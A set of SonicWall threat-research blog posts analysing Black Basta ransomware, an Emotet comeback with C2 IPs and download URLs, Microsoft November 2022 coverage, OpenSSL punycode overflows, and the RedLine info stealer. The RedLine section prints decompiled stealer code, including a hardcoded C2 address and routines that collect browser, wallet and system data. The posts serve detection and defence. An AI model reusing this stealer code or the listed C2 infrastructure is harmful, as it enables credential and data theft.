Posts

TOR chat with Black Basta ransomware operator runs dry

The SonicWall Capture Labs threat research team has recently been tracking a ransomware family called Black Basta. Black Basta first appeared in April 2022 and is believed to be operated by a well organized cybercrime group called Fin7. It has been reported that this group has already breached over 90 organizations and caused over $1B USD in damage.

 

Infection Cycle:

 

Upon execution, a console appears with the following text:

 

It then quickly disables console output using the FreeConsole Windows API:

 

It obtains information about storage volumes attached to the system and begins its encryption process:

 

Encrypted files are given a “.basta” file extension.

 

The malware uses RSA encryption.  The key is hardcoded and can be seen in the decompiled binary:

 

Various configuration options can also be seen in the decompiled code:

 

In order to prevent system recovery, the malware disables volume shadow copies using the vssadmin.exe program:

 

The malware drops dlaksjdoiq.jpg

 

dlaksjdoiq.jpg contains the following image:

 

A ransom message is written to readme.txt.  This file is copied into all directories containing encrypted files:

 

readme.txt contains the following ransom message:

 

fkdjsadasd.ico is dropped onto the system:

 

It contains the following icon:

 

The tOr link leads to the following page:

 

After logging in using the requested information, a chat interface is presented:

 

We had the following conversation with the attacker but were unable to obtain information about file retrieval costs:

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: BlackBasta.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Emotet Is Back!

Introduction

After several months of hiatus, Emotet is back. SonicWall Capture Labs threat research team has observed starting last week that the notorious malware, which heavily targets large organizations, has returned with similar tactics and functionality observed in past variants. Originally a banking trojan, Emotet has evolved into a dropper-type class of malware. It has been spreading through malicious Microsoft Office documents via email. Initially using JavaScript, VBA macros are now used to compromise the victims’ machines.

Figure 1: Infection Chain

Infection Vector

The infection vector is Excel 4.0 macros with malicious code distributed across excel spreadsheet cells. By default, the Excel file is opened in protected view, with the macros disabled. For this, Emotet Excel files have one image with instructions (Figure 2) asking user to copy the file to <Microsoft Office>\Templates folder and run again. This makes sure that execution of macros will be carried out seamlessly with user interaction.

Figure 2: Malicious document warning. The required actions infect the machine.

The macro code contains multiple URLs which further download the emotet dropper DLL.
URLs:
hxxp://app.clubdedocentes[.]com/storage/DCcq9ekgH99sI/
hxxp://linhkiendoc[.]com/app/payments/qoy5JqpLqrbsKl/
hxxp://sourcecool[.]com/throng/iOD/
hxxp://www.stickers-et-deco[.]com/Adapter/lYw/

Out of these 4 URLs only 3 were active at the time of analysis. These URLs downloaded 3 Emotet dropper DLLs having similar functionality. The DLLs are executed using regsvr32.exe.

Figure 3: View of the malicious VBA macro

DLL Analysis

Emotet is known for distributing many different malware families. During the analysis of two samples, no additional malware was observed being dropped or downloaded.

Sample 1

The dropper DLL has highly obfuscated custom packer code, including encrypted main Emotet DLL. The listed APIs involve multiple imports that are known to be used with malware. These cover multiple areas of monitoring, enumeration, execution, encryption, persistence, and exfiltration. Multiple APIs are loaded using DWORDs stored in memory (Figure 4).

Figure 4: Packed code shown in x64dbg

The custom decryption loop is used to decrypt the main Emotet DLL using key “vGZlfkkg?U^>+xzU”. Once regsvr32.exe is executed, the DLL is moved and renamed to “~\AppData\Local” and/or “\Windows\System32\” locations with a randomized name for both the parent folder and the file itself. A registry key is then created to autorun when the system is restarted (Figure 5).

Figure 5: Run Entry created for persistence

The process will then attempt to reach out to multiple IP addresses with a generated cookie and collected data. After initial communication with CnC servers it downloads further Emotet spammer module to the same folder or the “Appdata” directory.
For further spreading spammer module uses multiple malicious email templates like the one mentioned in Figure 6 below.


Figure 6: Email Template

It also uses a number of email domains, email addresses, their passwords and other information including malicious email attachments to spread across domains as seen in Figure 7.

Figure 7: Email Addresses and Passwords

This elaborates the redistribution mechanism of malware to infect other victims using already compromised email credentials.

Sample 2

This sample was a separate DLL file that showed several differences in both code and behavior. Manually running the decryption function resulted in a DLL being created within newly allocated memory space, but instead of a randomly named file, it’s called ‘clover.dll’ (Figure 8)  and differs from the dropper in multiple ways.

Figure 8: Clover.dll allocated in memory

 

The first point is that when clover.dll drops, it lacks several of the anti-analysis features that the original has; notably, one can go directly to the entrypoint in a debugger without the program terminating itself. There is also a string that produced only two Google results (f:\rtm\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl), both of which are samples on Alienvault OTX[i][ii].

Running ‘clover.dll’ with regsvr32.exe results in the same behavior as the dropper sample. It is moved to ~AppData\Local, a registry key is created for persistence, and system enumeration begins. Regsvr32 then spawns a child process and kills the parent (Figure 9), becoming a ‘non-existent process’; this is an anti-analysis technique that prevents debuggers from attaching to the process.

Figure 9: This process does not exist (to a debugger)

The second part to note is the way Emotet is communicating with the C2 servers: using regsvr32.exe to send TCP requests. No tool normally used for packet capture will show the action (Fiddler, Wireshark, TCPMon), except for Procmon. The entire communication occurs within 2-3ms as seen in Figures 10 and 11. Attempts to use netstat also failed.

Figure 10: Procmon output of TCP communications

Figure 11: Timestamps from beginning to end

Looking at the runtime memory of regsvr32, a large list of C2 addresses were found (Figure 12), along with cookie information and public keys.

Figure 12: Beginning of C2 list in private-mapped memory

 

SonicWall Real Time Deep Memory Inspection (RTDMI) is detecting the malicious Excel spread sheet in CAPTURE ATP. The emotet dropper, emotet dll and spammer module are also being detected by RTDMI.

Evidence of detection by RTDMI ™ engine for the emotet dll can be seen in the below screenshot :


Figure 13: RTDMI ATP Report results

IOCs

SHA256:
0bbcf67529105af0086ba37236adde773fa862a9af187c75903868d01b390202
a116213f16ecd416cbde43ddf94d3e5af1935886d19db1e978225c15616c1d7b
faf0a6cea7e6a5d7fea43ed8e2f89eee56f712e6334e19e1b4c2b75ffb71f720
dcb3f8703accb02764306e112857adf35fd93c46cd7bfe45a295f16e6a215c72
bf60837275da15ef6f67ab6214fea56a084045d19c056c01faecd3c5d5b7f207
baf72fda8d35b6f6653ecdae1bfac9ddb373b9a4e7d27e586cce30201557a1f8
c680183e3a3650a0930960227d8659ee5bba1406ef5c8f01546fd0c165c9eca2
04c40a669fcfcd20bd429cbe4f78c71e8403ca70f804262a24024cb40dba321b
64dca5069a1e7b3ed910d6525550cf1235de5199cb2a195da490d2cfb65334e4
b8d2ad91155d779270b7cb8b914e5a262d8a05bf39ba44dd56935a1ee9bc066e

C2 IP Addresses:

1.234.2[.]232:8080
101.50.0[.]91:8080
103.132.242[.]26:8080
103.43.75[.]120:443
103.75.201[.]2:443
104.168.155[.]143:8080
107.170.39[.]149:8080
110.232.117[.]186:8080
115.68.227[.]76:8080
119.59.103[.]152:8080
129.232.188[.]93:443
139.59.126[.]41:443
139.59.56[.]73:8080
147.139.166[.]154:8080
149.28.143[.]92:443
149.56.131[.]28:8080
153.126.146[.]25:7080
159.65.140[.]115:443
159.65.88[.]10:8080
159.89.202[.]34:443
160.16.142[.]56:8080
163.44.196[.]120:8080
164.68.99[.]3:8080
164.90.222[.]65:443
167.172.199[.]165:8080
167.172.253[.]162:8080
169.57.156[.]166:8080
169.60.181[.]70:8080
172.104.251[.]154:8080
172.105.226[.]75:8080
173.212.193[.]249:8080
182.162.143[.]56:443
182.162.143[.]5:8080
54.37.136[.]187:8080
95.54.66[.]204:1013
183.111.227[.]137:8080
185.4.135[.]165:8080
186.194.240[.]217:443
188.44.20[.]25:443
197.242.150[.]244:8080
201.94.166[.]162:443
206.189.28[.]199:8080
209.97.163[.]214:443
212.24.98[.]99:8080
213.239.212[.]5:443
45.118.115[.]99:8080
45.176.232[.]124:443
45.235.8[.]30:8080
5.135.159[.]50:443
51.161.73[.]194:443
72.15.201[.]15:8080
79.137.35[.]198:8080
82.223.21[.]224:8080
91.187.140[.]35:8080
91.207.28[.]33:8080
94.23.45[.]86:4143
95.217.221[.]146:8080

URLs:

hxxp://app.clubdedocentes[.]com/storage/DCcq9ekgH99sI/
hxxp://linhkiendoc[.]com/app/payments/qoy5JqpLqrbsKl/
hxxp://sourcecool[.]com/throng/iOD/
hxxp://www.stickers-et-deco[.]com/Adapter/lYw/

Public Keys:

RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5z/VpKQADAJA=
RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2a/UNKQAXAJA=

JA3 fingerprint:

8916410db85077a5460817142dcbc8de

Cookies:

WnnMFWF=0d3850HcEUxB57edscLqHsb2YxPDCKbPSZncMTx3O0h9lQgJCvRMC//BrnYhPFxgMRGCoZSHhMyTtzRWyGhLZIyda+8qlUGgEDzQZ0FNyFIFUjbe0aBVe6vknvoT1bSoMmylmeeNjwtPr1DVQt8JBHpbWAXjxP+zpYCEPYLK2b02cC0/cJtzfFLcECfpMT9WAGpj2uFr6QqpTPIivkS/Ta2r9sHA20takVBoZ9TbfwVVtlUfqlozgTltkAtCazcU/W8R9mfAVM1Y

Qs=0WODCSXcomwJtgWqI5e4bPB3yrdQoAEow+xn5MRK9/ao9xobva9p8/jpU6RvJLwBpREszZe6f224Qoc20YVdaKXLpEoD+CwRklu0H7XCKQZe8V+CPjtzCo5fzkDm2SHBIMJmPkIdY0HZvSGjXBvSwpA74U8FBJdbzKmUSvZKeLE2D1zGVF25KW5b0s+FQ9ah7qgmwJxNkXCL7cbrL73Cnqi5G3XPALWmwxxRbX2F/rzzDxIkkxHSBI7ggXr5ndl799lGGQd4F0v171zhI+/VNrTtpcEnZM5drvJsD/wrrEGBY7NJUGIom7MjeZtu8/cOx+TR

[i]https://otx.alienvault.com/indicator/file/7fbcad6af8fc4b6aa18f877feabcfc31b0a4b1a4895ccaf70a90bceaff9331d2/

[ii]https://otx.alienvault.com/indicator/file/f8fa14b1f1d267d5c348d97f516ea9e6912f8747a6e659b45c428d931082f6e6

Microsoft Security Bulletin Coverage for November 2022

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2022. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2022-41057 Windows HTTP.sys Elevation of Privilege Vulnerability
ASPY 380: Malformed-File exe.MP_281

CVE-2022-41096 Microsoft DWM Core Library Elevation of Privilege Vulnerability
ASPY 381: Malformed-File exe.MP_282

CVE-2022-41109 Windows Win32k Elevation of Privilege Vulnerability
ASPY 382: Malformed-File exe.MP_287

CVE-2022-41113 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
ASPY 383: Malformed-File exe.MP_288

CVE-2022-41118 Windows Scripting Languages Remote Code Execution Vulnerability
IPS 15529: Windows Scripting Languages Remote Code Execution (CVE-2022-41118)

CVE-2022-41125 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
ASPY 384: Malformed-File exe.MP_289

The following vulnerabilities do not have exploits in the wild :
CVE-2022-37966 Windows Kerberos RC4-HMAC Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37967 Windows Kerberos Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37992 Windows Group Policy Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38014 Windows Subsystem for Linux (WSL2) Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38015 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-38023 Netlogon RPC Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41039 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41044 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41045 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41047 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41048 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41049 Windows Mark of the Web Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-41050 Windows Extensible File Allocation Table Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41051 Azure RTOS GUIX Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41052 Windows Graphics Component Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41053 Windows Kerberos Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-41054 Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41055 Windows Human Interface Device Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41056 Network Policy Server (NPS) RADIUS Protocol Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-41058 Windows Network Address Translation (NAT) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-41060 Microsoft Word Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41061 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41062 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41063 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41064 .NET Framework Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41066 Microsoft Business Central Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41073 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41078 Microsoft Exchange Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2022-41079 Microsoft Exchange Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2022-41080 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41085 Azure CycleCloud Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41086 Windows Group Policy Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41088 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41090 Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-41091 Windows Mark of the Web Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-41092 Windows Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41093 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41095 Windows Digital Media Receiver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41097 Network Policy Server (NPS) RADIUS Protocol Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41098 Windows GDI+ Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41099 BitLocker Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-41100 Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41101 Windows Overlay Filter Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41102 Windows Overlay Filter Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41103 Microsoft Word Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41104 Microsoft Excel Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-41105 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41106 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41107 Microsoft Office Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41114 Windows Bind Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41116 Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-41119 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41120 Microsoft Windows Sysmon Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41122 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2022-41123 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41128 Windows Scripting Languages Remote Code Execution Vulnerability
There are no known exploits in the wild.

OpenSSL X509 Certificate Vulnerabilities

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  The OpenSSL Project develops and maintains the OpenSSL software a robust, commercial-grade, full-featured toolkit for general-purpose cryptography and secure communication. OpenSSL contains an open-source implementation of the SSL and TLS protocols. The core library, written in the C programming language, implements basic cryptographic functions and provides various utility functions.

  Overview of OpenSSL Vulnerabilities:
    (CVE-2022-3602) ossl_punycode_decode()​​, punycode domain name “xn--” buffer overflow.
    (CVE-2022-3786) ossl_a2ulabel(), punycode string that includes a dot “.” ensuring buffer overflow.

  A stack-based buffer overflow can be triggered in the X.509 certificate verification process, specifically in the ossl_punycode_decode buffer.

  An attacker can craft a malicious certificate to overflow the ossl_punycode_decode buffer in multiple scenarios. This buffer overflow could result in a DoS(Denial of Service) or potentially RCE(Remote Code Execution).

  Vendor Homepage

CVE Reference:

  The vulnerabilities have been assigned the Common Vulnerabilities and Exposures (CVE) identifiers:

    CVE-2022-3602 Listing
    CVE-2022-3786 Listing

Common Vulnerability Scoring System (CVSS):

  CVE-2022-3602 – Base 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C), Temporal 7.8 (E:POC/RL:OF/RC:C).
  CVE-2022-3786 – Base 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C), Temporal 5.8 (E:U/RL:OF/RC:C).

Technical Overview:

  Related to CVE-2022-3602:
    The vulnerability is due to a 4-byte (32-bit) buffer overflow that is caused by an off-by-one error inside OpenSSL’s Punycode library (ossl_punycode_decode) in punycode.c, where the “max length” argument (unsigned int *pout_length) is the number of elements allocated and not verified if out of bounds. The vulnerable function ossl_punycode_decode() is responsible in parsing all sub-domains starting with “xn--“. That means that any Punycode string that decodes to exactly one more 32-bit character than the maximum length will overwrite the memory immediately following the decoded string.

  Related to CVE-2022-3786:
    The vulnerability exists in the ossl_a2ulabel function within punycode.c, The vulnerability is due to improper validation of Punycode encoded strings. Memory addresses stored right after the buffer, causes a partial address overwrite that might lead to an exploitable memory corruption. The code is mostly contained in a infinite while loop, which processes each label (ie, the portions of the name between periods) until it runs out. If the label does not start with xn-- (ie, it’s a standard label), it’s basically copied directly into the output buffer. If the label does start with xn--, the else statement executes, and it decodes the punycode encoded string using the vulnerable ossl_punycode_decode function.

  The vulnerable Punycode functions are apart of the libcrypto.so shared library. (also libcrypto.a) They’re accessible through certificate-validation functions after certificate validation. In a trusted certificate, this can potentially affect any client application running a vulnerable server version of OpenSSL.

Triggering the Problem:

  • The target must have the vulnerable software installed.
  • The attacker must have network connectivity to the target server.

Triggering Conditions:

  TLS Connections:
  Normal Client/Server handshake connection. (Server sends Certificate)
  Mutual Authentication handshake connection. (Server sends Certificate and Server Asks For Client Certificate)

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • SSL/TLS transport mechanisms such as (HTTPS, SMTPS, SIPS, etc…)

  CVE-2022-3602 Attack Packet:
  
  CVE-2022-3786 Attack Packet:
  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 3332 OpenSSL X.509 Name Constraint Check Buffer Overflow
  • IPS: 3335 OpenSSL X.509 Name Constraint Check Buffer Overflow 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Upgrading the product to a non-vulnerable version.
    • Detecting and filtering malicious traffic using the signatures above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Follina Vulnerability is being used to deliver Redline info stealer

Introduction

Malware authors are extensively using C# code to build malware since last few years, due to its simplicity and rich Application Programming Interfaces (API). RedLine is a C# written advanced info stealer active in the wild since 2020, it is available Malware-as-a-Service (Maas) on underground forum to subscribe or one time purchase. RedLine was initially spreading by sharing Unified Resource Locator (URL) in emails to be downloaded. But the method needed human intervention to execute the downloaded payload. Recently, the RedLine has started using Follina exploit targeting the CVE-2022-30190 Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability, the method triggers the in-memory execution of the malware instead of saving on the disk. RedLine code is visibly simple with vast functionalities. Delivery and execution mechanism involves additional layers to prevent detection and analysis of the malware. The RedLine steals installed browsers data, digital wallets, FTP data, VPN data, Telegram files, Discord tokens, geographical data and captures screen.

 

Protection Layers

Protection layers are used recursively to bring and execute next level binary until gets the final payload, to prevent the detection and static analysis of the main payload.

Layer 1

The first binary contains encrypted resource entry named as “Helper_Classes”. RC2 decryption is used with key as ‘0989B3A46874B279F1BF795ED112CE22’ (MD5 from a string), mode as Electronic Code Book (ECB) and padding as PKCS7 to get next layer binary. Second layer binary is loaded and executed using reflection APIs.

 

Layer 2

The second binary contains Advanced Encryption Standard (AES) encrypted resource entry named as “Tesla”. AES algorithm is used with key ‘AB6EDF45E299A7B2968A9D7CD013C1164EFC6165508D691F085B7D9462EE945B’ (SHA256 from a string) and mode as ECB to get next layer binary. Export function from the third binary is invoked using reflection APIs by passing current executable path and payload binary bytes. The malware makes the persistence entry by copying itself into ‘%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\.exe’ using the PowerShell command (cmdlet).

Layer 3

This third binary is obfuscated variant of RunPE module available on GitHub by author NYAN CAT. The module accepts two arguments the executable file path and payload bytes. A new process is created for the provided file path and does process hollowing to execute the RedLine payload bytes.

 

RedLine Execution

The execution of RedLine info stealer starts from the main method that creates object of EntryPoint class which invokes the constructor, to initialize the Command and Control (C&C) IP addresses list, release identifier, message for the victim and key to decrypt. For the variant, key is kept empty as the fields including the C&C IP addresses list are not encrypted. The constructor also invokes unmanaged code APIs to hide the process console.

public EntryPoint()
{
NativeHelper.Hide();
IP = "45.155.165.19:24150";
ID = "rule";
Message = "";
Key = "";
}

After the initialization, Execute method is invoked which controls the complete execution flow starting from establishing connection with the C&C server using Simple Object Access Protocol (SOAP) API over Hypertext Transfer Protocol Secure (HTTPS) protocol. The malware tries to connect one of the IP addresses from the list of C&C IP addresses, separated by “|”, at the interval of 5 seconds until the connection is established.

bool flag = false;
while (!flag)
{
string[] array = StringDecrypt.Decrypt(entry.IP, entry.Key).Split(new string[1] { "|" }, StringSplitOptions.RemoveEmptyEntries);
foreach (string address in array)
{
if (endpointConnection.RequestConnection(address) && endpointConnection.TryGetConnection())
{
flag = true;
break;
}
}
Thread.Sleep(5000);
}

 

Object of ScanningArgs class is instantiated which contains configuration information including flags to control various actions on the victim’s machine, list for scanning directory paths and attributes to terminate malware execution.

public class ScanningArgs
{
public bool ScanBrowsers { get; set; }
public bool ScanFiles { get; set; }
public bool ScanFTP { get; set; }
public bool ScanWallets { get; set; }
public bool ScanScreen { get; set; }
public bool ScanTelegram { get; set; }
public bool ScanVPN { get; set; }
public bool ScanSteam { get; set; }
public bool ScanDiscord { get; set; }
public List<string> ScanFilesPaths { get; set; }
public List<string> BlockedCountry { get; set; }
public List<string> BlockedIP { get; set; }
public List<string> ScanChromeBrowsersPaths { get; set; }
public List<string> ScanGeckoBrowsersPaths { get; set; }
}

 

A new object of ScanningArgs is received from the C&C server to update the default configuration object.

while (!endpointConnection.TryGetArgs(out args))
{
if (!endpointConnection.TryGetConnection())
{
throw new Exception();
}
Thread.Sleep(1000);
}

 

The BlockedContry list and BlockedIP list is empty for the variant. ScanFilesPaths contains list of files information to be collected from the victim’s machine, ScanChromeBrowsersPaths contains paths of user data storage directory for Chromium based browsers and ScanGeckoBrowsersPaths contains paths user data storage directory for Gecko based browsers:

Two structures are used by the malware to store the stolen information from the compromised machine. ScanResult is the main structure which stores the basic information and references to another structure ScanDetails (object is referred as structure) which stores the advance information.

public struct ScanResult
{
public string Hardware { get; set; }
public string ReleaseID { get; set; }
public string MachineName { get; set; }
public string OSVersion { get; set; }
public string Language { get; set; }
public string Resolution { get; set; }
public ScanDetails ScanDetails { get; set; }
public string Country { get; set; }
public string City { get; set; }
public string TimeZone { get; set; }
public string IPv4 { get; set; }
public byte[] Monitor { get; set; }
public string ZipCode { get; set; }
public string FileLocation { get; set; }
public bool SeenBefore { get; set; }
}

 

ScanResult.ScanDetails = new ScanDetails
{
AvailableLanguages = new List<string>(),
Browsers = new List<ScannedBrowser>(),
FtpConnections = new List<Account>(),
GameChatFiles = new List<ScannedFile>(),
GameLauncherFiles = new List<ScannedFile>(),
InstalledBrowsers = new List<BrowserVersion>(),
MessageClientFiles = new List<ScannedFile>(),
NordAccounts = new List<Account>(),
Open = new List<ScannedFile>(),
Processes = new List<string>(),
Proton = new List<ScannedFile>(),
ScannedFiles = new List<ScannedFile>(),
ScannedWallets = new List<ScannedFile>(),
SecurityUtils = new List<string>(),
Softwares = new List<string>(),
SystemHardwares = new List<SystemHardware>()
};

 

The malware retrieves the geographical information using one of the below URLs and initializes fields IPv4, City, Country and ZipCode into ScanResult structure.

  • ‘https://api.ip.sb/geoip’
  • ‘https://ipinfo.io/ip’
  • ‘https://api.ipify.org’

 

The malware terminates its execution, if the county or IP address of the compromised machine belongs to its lists of blocked countries or IPs respectively.

public static void AKSFD8H23(ScanningArgs settings, ref ScanResult result)
{
GeoInfo geoInfo = GeoHelper.Get();
geoInfo.IP = (string.IsNullOrWhiteSpace(geoInfo.IP) ? "UNKNOWN" : geoInfo.IP);
geoInfo.Location = (string.IsNullOrWhiteSpace(geoInfo.Location) ? "UNKNOWN" : geoInfo.Location);
geoInfo.Country = (string.IsNullOrWhiteSpace(geoInfo.Country) ? "UNKNOWN" : geoInfo.Country);
geoInfo.PostalCode = (string.IsNullOrWhiteSpace(geoInfo.PostalCode) ? "UNKNOWN" : geoInfo.PostalCode);
List<string> blockedCountry = settings.BlockedCountry;
if (blockedCountry != null && blockedCountry.Count > 0 && settings.BlockedCountry.Contains(geoInfo.Country))
{
Environment.Exit(0);
}
List<string> blockedIP = settings.BlockedIP;
if (blockedIP != null && blockedIP.Count > 0 && settings.BlockedIP.Contains(geoInfo.IP))
{
Environment.Exit(0);
}
result.IPv4 = geoInfo.IP;
result.City = geoInfo.Location;
result.Country = geoInfo.Country;
result.ZipCode = geoInfo.PostalCode;
}

 

The malware contains 22 action methods to collect data and perform tasks on compromised machine. The methods are invoked dynamically and randomly, and some of them perform action based on the flag values from the object of ScanningArgs class.

Actions = new ParsingStep[22] {
asdkadu8, sdfo8n234, sdfi35sdf, sdf934asd, asdk9345asd, a03md9ajsd, asdk8jasd, лыв7рыва2, ылв92р34выа, аловй, ыал8р45, ываш9р34, длвап9345, ывал8н34, вал93тфыв, вашу0л34, навева, ащы9р34, ыва83о4тфыв, askd435, sdi845sa, asd44123
};
Random rnd = new Random();
Actions = Actions.OrderBy((ParsingStep x) => rnd.Next()).ToArray();
Actions = new ParsingStep[22] {
asdkadu8, sdfo8n234, sdfi35sdf, sdf934asd, asdk9345asd, a03md9ajsd, asdk8jasd, лыв7рыва2, ылв92р34выа, аловй, ыал8р45, ываш9р34, длвап9345, ывал8н34, вал93тфыв, вашу0л34, навева, ащы9р34, ыва83о4тфыв, askd435, sdi845sa, asd44123
};
foreach (ParsingStep parsingStep in actions)
{
try
{
parsingStep(settings, ref result);
}
catch
{}
}

 

Action Methods

Action methods are used to fill the ScanResult and ScanDetails structures with the stolen data from the compromised machine.

 

  1. asdkadu8 (HardwareID)

Retrieves and concatenates domain name, username and serial number from the compromised machine to compute the MD5 hash. The MD5 hash is assigned to the Hardware field into ScanResult structure. This Hardware field can be used by the threat actors to identify the compromised machine.

ScanResult.Hardware = CryptoHelper.GetMd5Hash(Environment.UserDomainName + Environment.UserName + SystemInfoHelper.GetSerialNumber()).Replace("-", string.Empty);

 

  1. sdfo8n234 (ExecutableLocation)

File path of the running executable is assigned to FileLocation field into ScanResult structure.

ScanResult.FileLocation = Assembly.GetExecutingAssembly().Location;

 

  1. sdfi35sdf (OSInfo)

Retrieves input language, Time Zone and Operating System (OS) version from the compromised machine, and assigns respectively into Language, TimeZone and OSVersion fields into ScanResult structure.

ScanResult.Language = InputLanguage.CurrentInputLanguage.Culture.EnglishName;
ScanResult.TimeZone = TimeZoneInfo.Local.DisplayName;
ScanResult.OSVersion = SystemInfoHelper.GetWindowsVersion();

 

  1. sdf934asd (UserName)

Username of the compromised machine is assigned to MachineName field into ScanResult structure.

ScanResult.MachineName = Environment.UserName;

 

  1. asdk9345asd (ProcessorInfo)

Windows Management Instrumentation (WMI) query ‘SELECT * FROM Win32_Processor’ is executed to retrieve the processor information. Processor name, number of cores and processor type is assigned to Name, Counter and HardType fields respectively and added to SystemHardwares list into ScanDetails structure.

ScanResult .ScanDetails.SystemHardwares
{
Name = (managementObject["Name"] as string),
Counter = Convert.ToString(managementObject["NumberOfCores"]),
HardType = HardwareType.Processor
}

 

  1. a03md9ajsd (GraphicInfo)

WMI query ‘SELECT * FROM Win32_VideoController’ is executed to retrieve the graphics information. Name, AdapterRAM and Graphic type is assigned to Name, Counter and HardType fields respectively and added to SystemHardwares list into ScanDetails structure.

 

ScanResult.ScanDetails.SystemHardwares
{
Name = (managementObject["Name"] as string),
Counter = Convert.ToUInt32(managementObject["AdapterRAM"]).ToString(),
HardType = HardwareType.Graphic
}

 

  1. asdk8jasd (BrowsersInfo)

Installed browser information is retrieved using registry entry ‘HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\StartMenuInternet’ for 64bit machine and ‘HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet’ for 32bit machine. Name of the subkey, file path value of subkey ‘shell\open\command’ and version information from file path is assigned to NameOfBrowser, PathOfFile and Version respectively and added to InstalledBrowsers list into ScanResult structure.

 

ScanResult.ScanDetails.InstalledBrowsers
{
NameOfBrowser          :           registry subkey name
PathOfFile                  :           subkey value for ‘shell\open\command’
Version                     :           version information from the browser’s executable
